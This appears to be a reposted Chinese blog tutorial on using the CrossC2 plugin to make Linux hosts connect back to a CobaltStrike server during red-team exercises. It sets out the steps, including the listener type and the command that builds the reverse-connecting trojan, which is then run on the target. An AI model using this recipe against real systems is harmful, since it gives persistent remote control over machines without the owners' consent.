工具的使用 | CobaltStrike上线Linux主机(CrossC2)

CobaltStrike上线Linux主机(CrossC2)

写在前面

在红蓝对抗中，我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机，我们可以使用CobaltStrike，那么自然我们会想问，CobaltStrike能否对Linux主机进行长期远控呢？

在上一篇文章中我提到了，CobaltStrike自身上线Linux主机的情况，需要知道对方Linux主机的账号密码或SSH秘钥，并且还需要获取一台其他机器权限作为中继。传送门：CobaltStrike SSH远程登录

本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell，这得依赖于一个CobaltStrike的插件CrossC2。

CrossC2插件项目地址：https://github.com/gloxec/CrossC2

注：CrossC2项目官方声明只支持CobaltStrike3.14版本，本人亲测CobaltStrike4.0也可正常上线，但是无法执行其他操作。

1：首先，访问CrossC2项目地址，下载该项目。

将项目src目录下 genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。

2：将 CobaltStrike 服务端的.cobaltstrike.beacon_keys下载到 CobaltStrike 客户端目录下。

3：由于 Cross C2目前只支持HTTPS Beacon，所以在Listenrs中选择HTTPS进行监听，

服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

4：生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

5：执行木马上线

责编：vivian

来源：谢公子博客